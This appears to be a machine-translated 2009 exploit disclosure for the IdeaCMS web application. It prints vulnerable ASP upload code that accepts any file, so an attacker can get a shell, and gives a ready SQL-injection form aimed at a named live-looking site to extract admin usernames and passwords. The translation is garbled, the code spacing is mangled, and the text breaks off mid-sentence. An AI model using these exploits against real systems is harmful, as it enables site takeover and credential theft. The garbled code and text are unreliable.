IdeaCMS 0day +Exp2009-vulnerability warning-the black bar safety net

2009-09-26T00:00:00
ID MYHACK58:62200924792
Type myhack58
Reporter 佚名
Modified 2009-09-26T00:00:00

Description

From: www.link0day.cn

Tasteless upload vulnerability but the background get the shell made a contribution to

upinc. asp:

<!--# include file="chkuser. asp" - > <%Server. ScriptTimeOut=5 0 0 0%> <style type="text/css"> *{ padding:0px; margin:0px; font-size:12px} a{ color:#6 6 6 6 6 6;} a:hover{ color:#0 0 0 0 0 0} </style> <!--# include FILE="upload_5xsoft. inc"--> <% f="Uploadpic/" 'picture of the storage folder path n=request. QueryString("n") x=request. QueryString("x") m=request("m") if m="ok" then set upload=new upload_5xsoft set file=upload. file("file1") formPath=f if file. fileSize>0 then file. saveAs Server. mappath(formPath&file. FileName) %> <script> <%if x=1 then%> parent. document. all.& lt;%=n%>. value=parent. document. all.& lt;%=n%>. value+"! "; <%else%> parent. document. all.& lt;%=n%>. value="admin/<%=f%><%=File. FileName%>"; <%end if%> </script>

<input value="admin/<%=f%><%=File. FileName%>" name="text" type="hidden"> <a href="#" >[copy the address]</a> <a href="upinc. asp? n=<%=n%>&x=<%=x%>">[re-upload]</a> <% end if set file=nothing set upload=nothing else %> <form name="form1" method="post" action="upinc. asp? m=ok&n=<%=n%>&x=<%=x%>" enctype="multipart/form-data" style="margin:0px; margin:0px;" > <input type="file" name="file1" style="width:2 0 0" class="tx1" value=""><input name="" type="submit" value="upload" /> </form> <%end if%>

Included in that file just use session authentication is empty. it. Very tasteless~

This upload can upload any file.

The following is an injection vulnerability in the exp directly into the exp. does not analyze the interested to go down parts of down analysis:

<H1>IdeaCMS 's EXP --code by Link</H1><br><br> <form action="http://www.taikoosoft.com/NewsShow.asp?id=30+union select 1,2,3,4,5,6,7,8,9,10

from admin where" method=post name=myform enctype="multipart/form-data"> <input type=submit value=Fuck> </form>

/*Table has three fields, admin_user admin_pwd ID Yourself to change the following statement may put

Very simple. Does not analyze a